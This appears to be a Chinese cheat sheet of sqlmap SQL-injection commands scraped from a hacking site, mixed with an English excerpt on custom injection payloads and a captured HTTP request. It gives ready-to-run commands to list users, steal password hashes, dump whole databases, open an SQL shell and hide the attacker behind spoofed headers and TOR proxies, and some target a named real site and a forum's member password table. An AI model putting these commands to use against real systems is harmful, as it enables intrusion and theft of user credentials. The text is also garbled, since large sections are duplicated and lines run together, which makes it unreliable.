python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --is-dba -v 1
列举数据库用户
python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --users -v 0
列举数据库用户密码
python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --passwords -v 0
python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ --passwords -U sa -v 0
查看用户权限
python sqlmap.py -u ”www.myhack58.com/sqlmap/oracle/get_int.php?id=1“ --privileges -v 0
python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --privileges -U postgres -v 0
列数据库
python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ --dbs -v 0
列出指定数据库指定表的列名
python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --columns -T users -D test -v 1
列出指定数据库的指定表的指定列的内容
python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ --dump -T users -D master -C surname -v 0
指定列的范围从2-4
python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --dump -T users -D test --start 2 --stop 4 -v 0
导出所有数据库,所有表的内容
python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --dump-all -v 0
只列出用户自己新建的数据库和表的内容
python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/get_int.php?id=1“ --dump-all --exclude-sysdbs -v 0
sql query
python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --sql-query ”Select usename FROM pg_user“ -v 0
python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ --sql-query ”Select host, password FROM mysql.user LIMIT 1, 3“ -v 1
Select usename, passwd FROM pg_shadow orDER BY usename
保存和恢复会话
python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ -b -v 1 -s ”sqlmap.log“
保存选项到INC配置文件
python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ -b -v 1 --save
获取数据库名
./sqlmap.py -u ”www.xx.php?nid=14550“ --user-agent ”Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)“ --dbs获取表名
./sqlmap.py -u ”www.xxx.php?nid=14550“ --user-agent ”Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)“ -D database --tables
获取列名
./sqlmap.py -u ”www.xxx.php?nid=14550“ --user-agent ”Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)“ -D database -T cdb_adminactions --columns
获取值
./sqlmap.py -u ”www.xxx.php?nid=14550“ --user-agent ”Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)“ -D database -T cdb_members -C username,password --dump
来源:影子
更新
svn checkout svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-devsqlmap.py -u ”www.islamichina.com/hotelinchina.asp?cityid=2&m=1“ -v 1 --sql-shell //执行SQL语句
sqlmap.py -u ”www.islamichina.com/hotelinchina.asp?cityid=2&m=1“ -v 5 //更详细的信息
load options from a configuration INI file
sqlmap -c sqlmap.conf使用POST方法提交
sqlmap.py -u ”www.myhack58.com/sqlmap/oracle/post_int.php“ --method POST --data ”id=1“使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies
python sqlmap.py -u ”www.myhack58.com/sqlmap/mssql/cookie_int.php“ --cookie ”id=1“ -v 1使用referer欺骗
python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --referer ”www.google.com“ -v 3使用自定义user-agent,或者使用随机使用自带的user-agents.txt
python sqlmap.py -u ”www.myhack58.com/sqlmap/oracle/get_int.php?id=1“ --user-agent ”Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)“ -v 3python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ -v 1 -a ”./txt/user-agents.txt“
使用基本认证
python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/basic/get_int.php?id=1“ --auth-type Basic --auth-cred ”testuser:testpass“ -v 3使用Digest认证
python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/digest/get_int.php?id=1“ --auth-type Digest --auth-cred ”testuser:testpass“ -v 3使用代理,配合TOR
python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --proxy ”192.168.1.47:3128“
python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ --proxy ”192.168.1.47:8118“使用多线程猜解
python sqlmap.py -u ”www.myhack58.com/sqlmap/mysql/get_int.php?id=1“ -v 1 --current-user --threads 3绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入
python sqlmap.py -u ”www.myhack58.com/sqlmap/pgsql/get_int.php?id=1“ -v 1 -p ”id
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1&cat=2” -v 1 -p “cat,id”
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/ua_str.php” -v 1 -p “user-agent” --user-agent “sqlmap/0.7rc1 (sqlmap.sourceforge.net)”指定数据库,绕过SQLMAP的自动检测
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” -v 2 --dbms “PostgreSQL”* MySQL
* oracle
* PostgreSQL
* Microsoft SQL Server指定操作系统,绕过SQLMAP自动检测
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” -v 2 --os “Windows”* Linux
* Windows自定义payload
Options: --prefix and --postfixIn some circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix.
Example on a MySQL 5.0.67 target on a page where the SQL query is: $query = “Select * FROM users Where id=('” . $_GET['id'] . “') LIMIT 0, 1”;:
$ python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_str_brackets.php?id=1” -v 3 -p “id” --prefix “'” --postfix “AND 'test'='test”
[...]
[hh:mm:16] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[hh:mm:16] [INFO] testing custom injection on GET parameter 'id'
[hh:mm:16] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20
%28%27test%27=%27test HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: www.myhack58.com:80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:17] [INFO] GET parameter 'id' is custom injectable
[...]As you can see, the injection payload for testing for custom injection is:
id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test
which URL decoded is:
id=1') AND 7433=7433 AND ('test'='test
and makes the query syntatically correct to the page query:
Select * FROM users Where id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1
In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.
页面比较
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1” --string “luther” -v 1
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1” --regexp “lu[w][w]er” -v排除网站的内容
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_refresh.php?id=1” --excl-reg “Dynamic content: ([d]+)”多语句测试,php内嵌函数mysql_query(),不支持多语句
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --stacked-test -v 1union注入测试
python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1” --union-test -v 1unionz注入配合orderby
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_str.php?id=1” --union-test --union-tech orderby -v 1python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” -v 1 --union-use --banner
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” -v 5 --union-use --current-user
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int_partialunion.php?id=1” -v 1 --union-use --dbsfingerprint
python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” -v 1 -f
python sqlmap.py -u “192.168.123.36/sqlmap/get_str.asp?name=luther” -v 1 -f -b判断当前用户是否是dba
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --is-dba -v 1列举数据库用户
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --users -v 0
列举数据库用户密码
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --passwords -v 0
python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” --passwords -U sa -v 0查看用户权限
python sqlmap.py -u “www.myhack58.com/sqlmap/oracle/get_int.php?id=1” --privileges -v 0
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --privileges -U postgres -v 0列数据库
python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” --dbs -v 0列出指定数据库指定表的列名
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --columns -T users -D test -v 1列出指定数据库的指定表的指定列的内容
python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” --dump -T users -D master -C surname -v 0指定列的范围从2-4
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --dump -T users -D test --start 2 --stop 4 -v 0导出所有数据库,所有表的内容
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --dump-all -v 0只列出用户自己新建的数据库和表的内容
python sqlmap.py -u “www.myhack58.com/sqlmap/mssql/get_int.php?id=1” --dump-all --exclude-sysdbs -v 0sql query
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” --sql-query “Select usename FROM pg_user” -v 0
python sqlmap.py -u “www.myhack58.com/sqlmap/mysql/get_int.php?id=1” --sql-query “Select host, password FROM mysql.user LIMIT 1, 3” -v 1Select usename, passwd FROM pg_shadow orDER BY usename
保存和恢复会话
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” -b -v 1 -s “sqlmap.log”保存选项到INC配置文件
python sqlmap.py -u “www.myhack58.com/sqlmap/pgsql/get_int.php?id=1” -b -v 1 --save
★ 双向跨站(Double Trap XSS)注入分析脚本安全
★ 抓安全生产
